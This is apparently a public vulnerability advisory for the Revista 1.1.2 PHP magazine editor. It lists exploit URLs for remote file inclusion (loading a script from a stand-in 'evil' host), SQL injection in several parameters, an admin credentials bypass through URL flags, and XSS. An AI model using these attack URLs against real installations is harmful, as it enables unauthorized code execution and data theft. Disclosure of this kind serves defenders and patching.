Discovered by Sirdarckcat from <a href="http://elhacker.net">elhacker.net</a><br>------------------------------------------------------------------------------------<br><br>Revista 1.1.2<br><a href="http://php-revista.sourceforge.org">
http://php-revista.sourceforge.org</a><br><br>------------------------------------------------------------------------------------<br><br>Revista is a simple spanish PHP magazine editor.<br>It was done by <a href="http://php.org.mx">
php.org.mx</a><br><br>It suffers of multiple vulnerabilities.<br><br>------------------------------------------------------------------------------------<br><br>Remote File Inclusion<br><br><a href="http://revista/estilo/[ANY">
http://revista/estilo/[ANY</a> STYLE]/index.php?adodb=<a href="http://evil/script">http://evil/script</a><br><br>------------------------------------------------------------------------------------<br><br>SQLi<br><br><a href="http://revista/estilo/[ANY">
http://revista/estilo/[ANY</a> STYLE]/busqueda_tema.php?id_temas=-1+[SQL]<br><br><a href="http://revista/estilo/[ANY">http://revista/estilo/[ANY</a> STYLE]/busqueda.php?cadena='+[SQL]<br><br><a href="http://revista/estilo/[ANY">
http://revista/estilo/[ANY</a> STYLE]/autor.php?id_autor=-1+[SQL]<br><br><a href="http://revista/estilo/[ANY">http://revista/estilo/[ANY</a> STYLE]/lista.php?email='+[SQL]<br><br><a href="http://revista/estilo/[ANY">http://revista/estilo/[ANY
</a> STYLE]/articulo.php?id_articulo=-1+[SQL]<br><br>------------------------------------------------------------------------------------<br><br>Credentials Bypass<br><br><a href="http://revista/admin/index.php?ID_ADMIN=1&SUPER_ADMIN=1">
http://revista/admin/index.php?ID_ADMIN=1&SUPER_ADMIN=1</a><br><br>------------------------------------------------------------------------------------<br><br>XSS<br><br><a href="http://revista/estilo/[ANY">http://revista/estilo/[ANY
</a> STYLE]/busqueda.php?cadena=<XSS><br><br><a href="http://revista/estilo/[ANY">http://revista/estilo/[ANY</a> STYLE]/lista.php?email=<XSS><br><br>------------------------------------------------------------------------------------
<br><br>Att.<br>Sirdarckcat<br><a href="http://elhacker.net">elhacker.net</a>